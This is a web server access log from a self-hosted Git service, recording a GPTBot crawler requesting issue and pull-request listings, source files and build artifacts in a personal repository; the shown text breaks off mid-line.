"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:19:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:41:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:19:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:19:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 11098] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:19:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fwarn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 18956] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fwarn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 20576] [Gzip 4.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:19:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:42:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:42:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 32259343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?state=closed&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:19:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11581] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11579] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md?display=rendered" [Client 74.7.227.38] [Length 17128] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:19:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py?display=source" [Client 74.7.227.38] [Length 15141] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:19:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat?display=source" [Client 74.7.227.38] [Length 14589] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:19:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11581] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11581] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 6593] [Gzip -] [Sent-to 